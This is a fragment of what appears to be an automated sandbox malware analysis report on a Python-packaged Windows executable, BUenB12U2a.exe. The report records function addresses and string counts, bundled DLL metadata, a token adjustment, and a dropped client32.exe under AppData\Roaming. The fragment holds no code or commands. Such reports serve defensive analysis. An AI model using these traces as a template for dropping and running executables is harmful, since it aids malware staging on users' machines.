                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013BD0581_2_00007FFE013BD058
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013810701_2_00007FFE01381070
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013359201_2_00007FFE01335920
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133B8D01_2_00007FFE0133B8D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013703401_2_00007FFE01370340
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013453441_2_00007FFE01345344
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01339BE01_2_00007FFE01339BE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133B3111_2_00007FFE0133B311
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0136DB301_2_00007FFE0136DB30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0136C3301_2_00007FFE0136C330
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133EAC01_2_00007FFE0133EAC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01348DAC1_2_00007FFE01348DAC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133DDE01_2_00007FFE0133DDE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133ADF01_2_00007FFE0133ADF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133FC801_2_00007FFE0133FC80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133F4901_2_00007FFE0133F490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013744901_2_00007FFE01374490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0136A4B01_2_00007FFE0136A4B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0140AC5C1_2_00007FFE0140AC5C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013994501_2_00007FFE01399450
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133BD201_2_00007FFE0133BD20
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0134FD301_2_00007FFE0134FD30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01345CD01_2_00007FFE01345CD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133F4901_2_00007FFE0133F490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01337F801_2_00007FFE01337F80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0134CFB01_2_00007FFE0134CFB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01339ED01_2_00007FFE01339ED0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013487601_2_00007FFE01348760
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013CB8281_2_00007FFE013CB828
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01346FC01_2_00007FFE01346FC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133A6A01_2_00007FFE0133A6A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0133DDE01_2_00007FFE0133DDE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013357201_2_00007FFE01335720
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013C36D81_2_00007FFE013C36D8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01339ED01_2_00007FFE01339ED0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10301E901_2_00007FFE10301E90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302E701_2_00007FFE10302E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE103066401_2_00007FFE10306640
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10309A401_2_00007FFE10309A40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302B001_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE103039701_2_00007FFE10303970
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10308FA01_2_00007FFE10308FA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10304E301_2_00007FFE10304E30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE115112B01_2_00007FFE115112B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE115110001_2_00007FFE11511000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE115118E01_2_00007FFE115118E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA8B6C1_2_00007FFE11EA8B6C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EAA5D41_2_00007FFE11EAA5D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA84B01_2_00007FFE11EA84B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA58981_2_00007FFE11EA5898
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EAA2881_2_00007FFE11EAA288
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EAB85C1_2_00007FFE11EAB85C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA98501_2_00007FFE11EA9850
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11EA9C481_2_00007FFE11EA9C48
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE11ED10601_2_00007FFE11ED1060
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D12B01_2_00007FFE126D12B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D2E601_2_00007FFE126D2E60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D72F41_2_00007FFE126D72F4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D23801_2_00007FFE126D2380
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D54A01_2_00007FFE126D54A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D19001_2_00007FFE126D1900
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D44F01_2_00007FFE126D44F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D8E201_2_00007FFE126D8E20
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126DFA201_2_00007FFE126DFA20
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D19E01_2_00007FFE126D19E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE126D5DD01_2_00007FFE126D5DD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE12E12BA01_2_00007FFE12E12BA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13213E701_2_00007FFE13213E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13212EB01_2_00007FFE13212EB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1321C8981_2_00007FFE1321C898
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE132160F01_2_00007FFE132160F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13213BD01_2_00007FFE13213BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE132110001_2_00007FFE13211000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE13302E401_2_00007FFE13302E40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E2ED01_2_00007FFE148E2ED0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E39F01_2_00007FFE148E39F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E32E01_2_00007FFE148E32E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E3F501_2_00007FFE148E3F50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E1F501_2_00007FFE148E1F50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE148E27A01_2_00007FFE148E27A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE1A457CA01_2_00007FFE1A457CA0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_107021306_2_10702130
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070698F6_2_1070698F
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_107036C06_2_107036C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C338F806_2_6C338F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C360F536_2_6C360F53
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C361F406_2_6C361F40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3519B06_2_6C3519B0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C361B586_2_6C361B58
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3676936_2_6C367693
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3317606_2_6C331760
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3617866_2_6C361786
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C33C0906_2_6C33C090
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3313106_2_6C331310
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3463A06_2_6C3463A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3613E86_2_6C3613E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5C6E186_2_6C5C6E18
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C566E246_2_6C566E24
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C566E286_2_6C566E28
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5809196_2_6C580919
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5E09156_2_6C5E0915
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C59EB1A6_2_6C59EB1A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5684686_2_6C568468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5745AE6_2_6C5745AE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5F67FF6_2_6C5F67FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5CE7F16_2_6C5CE7F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5C41596_2_6C5C4159
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C56A1DD6_2_6C56A1DD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5521F06_2_6C5521F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AA2776_2_6C5AA277
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5E82206_2_6C5E8220
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5C22CD6_2_6C5C22CD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C56828B6_2_6C56828B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C56839B6_2_6C56839B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5E1CEF6_2_6C5E1CEF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C569C8E6_2_6C569C8E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C567D206_2_6C567D20
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C563DB16_2_6C563DB1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C565E206_2_6C565E20
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADF356_2_6C5ADF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5C98776_2_6C5C9877
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5CF8BA6_2_6C5CF8BA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5E39686_2_6C5E3968
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADA386_2_6C5ADA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5F1AE06_2_6C5F1AE0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C563B1D6_2_6C563B1D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5F7B2A6_2_6C5F7B2A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5CD43B6_2_6C5CD43B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AD4FF6_2_6C5AD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5675C16_2_6C5675C1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5635FA6_2_6C5635FA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5696C96_2_6C5696C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5F96A76_2_6C5F96A7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC16F appears 335 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE10301070 appears 43 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE00761325 appears 477 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FF748AF2710 appears 104 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC265 appears 48 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC93D appears 69 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC931 appears 39 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE10301D70 appears 39 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FF748AF2910 appears 34 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC181 appears 1188 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFE007DC17B appears 38 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C3358D0 appears 173 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C560934 appears 59 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C35C9F9 appears 33 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C56A455 appears 33 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C333050 appears 47 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C345940 appears 60 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C56B69A appears 47 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C560950 appears 130 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C345B20 appears 35 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C345BB0 appears 132 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C356AB0 appears 60 times
                                Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-kernel32-legacy-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: python3.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: BUenB12U2a.exe, 00000000.00000003.1713122564.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713884666.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714111041.0000021D68869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716684625.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713533133.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715337207.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712921749.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714537738.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713821207.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1723175250.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714619958.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715779957.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715858737.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1711435934.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712061374.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712744787.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713056195.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1711914802.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714204693.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714286119.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712366754.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713390708.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716134858.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713321376.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714452192.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714026120.0000021D6886A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716606223.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713680258.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713600901.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713191627.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713960779.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715602426.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713264817.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713469829.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712461168.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713747367.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712236185.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1712637069.0000021D68862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716027866.0000021D6886B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
